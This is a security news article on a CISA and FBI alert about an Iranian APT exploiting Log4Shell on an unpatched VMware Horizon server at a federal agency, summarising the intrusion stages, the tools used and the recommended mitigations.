An Iranian Advanced Persistent Threat (APT) actor has exploited the Log4Shell vulnerability (CVE-2021-44228) in an unpatched VMware Horizon server of a Federal Civilian Executive Branch (FCEB) organization, according to a recent alert from the Cybersecurity and Infrastructure Security Agency (CISA).
CISA and the Federal Bureau of Investigation launched an investigation into suspected APT activity in mid-June 2022. The investigation revealed the threat actors gained access to the server in February 2022 by exploiting the Log4Shell bug, then installed XMRig crypto mining software, and moved laterally to the domain controller (DC). The threat actors downloaded several tools, including PsExec, Mimikatz, and Ngrok. Mimikatz was used for credential theft and Ngrok reverse proxies were implanted on multiple hosts for persistence.
Log4Shell was first disclosed in December 2021 and threat actors were quick to start exploiting the vulnerability on unpatched systems. Scans for vulnerable servers started immediately after the disclosure. VMWare issued a warning in January to all users of VMWare Horizon servers to protect their servers against attacks leveraging the Log4Shell vulnerability, and CISA issued a warning in June 2022 that nation state actors from Iran, China, North Korea, and Turkey and cybercriminal groups were exploiting the Log4Shell vulnerability on VMware Horizon and Unified Access Gateway (UAG) servers. Vulnerable servers have been attacked and ransomware, information stealers, backdoors, and cryptocurrency miners have been installed.
CISA and the FBI have issued a warning to all organizations that use the affected VMWare systems that have not applied patches to fix the Log4Shell vulnerability or implemented the recommended mitigations to do so immediately. They include updating the affected systems to the latest version, minimizing the Internet-facing attack surface, implementing best practices for identity and access management, exercising, testing, and validating your organization’s security program against the threat behaviors mapped to the MITRE ATT&CK for Enterprise framework, and testing existing security controls against the ATT&CK techniques outlined in the security advisory.
Organizations that did not immediately patch or implement mitigations against Log4Shell should assume that they have already been compromised and should initiate threat hunting activities. If initial access or compromise is detected, they should assume there has also been lateral movement, and should investigate all connected systems for signs of compromise and should audit all privileged accounts.